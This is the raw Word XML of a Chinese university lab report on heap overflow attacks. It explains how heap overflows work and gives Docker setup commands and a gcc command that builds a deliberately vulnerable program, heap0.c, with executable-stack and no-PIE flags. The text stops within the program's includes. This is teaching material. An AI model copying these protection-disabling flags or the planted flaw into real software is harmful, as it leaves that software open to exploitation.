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A5A47" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:afterLines="100" w:after="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="720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北京科技大学实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31661901" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>学院：计算机与通信工程学院</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>专业：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信息安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>班级：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信安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">192          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA1295" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:beforeLines="100" w:before="312" w:afterLines="100" w:after="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>姓名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>霍</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>炟</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">41824147       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验日期：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07A217" w14:textId="55D7338B" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="720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实验名称：</w:t>
      </w:r>
      <w:r w:rsidR="001E557C" w:rsidRPr="001E557C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>堆溢出攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E21C88" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D4E85" w14:textId="31D781E5" w:rsidR="00A048C5" w:rsidRPr="00DC29B7" w:rsidRDefault="00DC29B7" w:rsidP="00DB21F3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC29B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>学习堆溢出攻击的原理和实践。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A183D" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>实验仪器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1CCA07" w14:textId="3A5AC134" w:rsidR="00B12D0A" w:rsidRPr="00B12D0A" w:rsidRDefault="00B12D0A" w:rsidP="001F1FC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Linux-3.10.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A30A06C" w14:textId="3587EB4D" w:rsidR="00A048C5" w:rsidRPr="000D1721" w:rsidRDefault="00B12D0A" w:rsidP="001F1FC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker-19.03.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268714EB" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E223FE" w14:textId="67BBCFAB" w:rsidR="00B12D0A" w:rsidRPr="00B12D0A" w:rsidRDefault="00B12D0A" w:rsidP="00B12D0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12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>程序的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>堆空间</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是可以自由，自我管理分配和释放的内存空间，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>堆空间</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的生存周期由程序员决定。堆溢出攻击是指利用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对堆空间</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行越界写操作而达成的攻击行为。本实验对</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C程序的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>堆空间</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行缓冲区溢出攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239313ED" w14:textId="2B1ABDBF" w:rsidR="00A048C5" w:rsidRDefault="00B12D0A" w:rsidP="00B12D0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12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>程序的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>堆空间</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可由</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12D0A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>malloc(int)等函数分配， 一旦成功分配，返回分配好的地址，我们需要接受这个地址去操作，所以我们用一个指针去接收这个地址。对于这个地址的读写，由程序员自由把握。输入参数指定分配的大小，单位是字节。例如，char *p=(char *)malloc(100); //分配100个字节，分配的时候指定类型为char *类型，所以就可以存储100个字符。另一方面，如果攻击者向p写入超过100个字节的数据，那么多写的数据就会覆盖其他的内存，导致程序设计者意想不到的后果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEE0E12" w14:textId="77777777" w:rsidR="00B12D0A" w:rsidRPr="00B12D0A" w:rsidRDefault="00B12D0A" w:rsidP="00B12D0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5C7037E6" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实验内容与步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FD1C75" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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20076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>载入需要用的镜像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47398E1E" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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060DF808" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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20076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cd ~/images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F10A4B" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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20076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker load &lt; snortbox.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A24D2B7" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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20076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00720076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker容器</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00720076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intro_node</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11B46670" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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50CA93C1" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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20076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker run -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00720076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>itd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00720076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --privileged -w /root --name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00720076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intro_node</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0072007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720076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>snortbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06932E61" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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20076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如已创建，就可以直接启动容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5766FBDB" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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24D8D860" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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20076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">docker start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00720076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intro_node</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DF1B038" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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20076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在终端中打开容器并进入容器内部</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0229EA" w14:textId="77777777" w:rsidR="00720076" w:rsidRPr="00720076" w:rsidRDefault="00720076" w:rsidP="0072007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4D86390E" w14:textId="5C4AAE1F" w:rsidR="00A048C5" w:rsidRDefault="00720076" w:rsidP="0072007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20076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">docker attach </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00720076">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intro_node</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3806C297" w14:textId="71664554" w:rsidR="00AB6A0D" w:rsidRPr="00AB6A0D" w:rsidRDefault="00AB6A0D" w:rsidP="0072007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B6A0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B7EA205" wp14:editId="75090DF7">
            <wp:extent cx="5274310" cy="32245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81EA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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intro_node1控制台，编译脆弱性C程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A4CED1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6A9EF579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D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> heap0.c -w -g -no-pie -z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o heap0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3C2315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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>脆弱性</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heap0.c的源码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711ACDB1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2C520340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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61538324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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unistd.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDAF490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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E51525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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64692EAA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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include &lt;sys/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
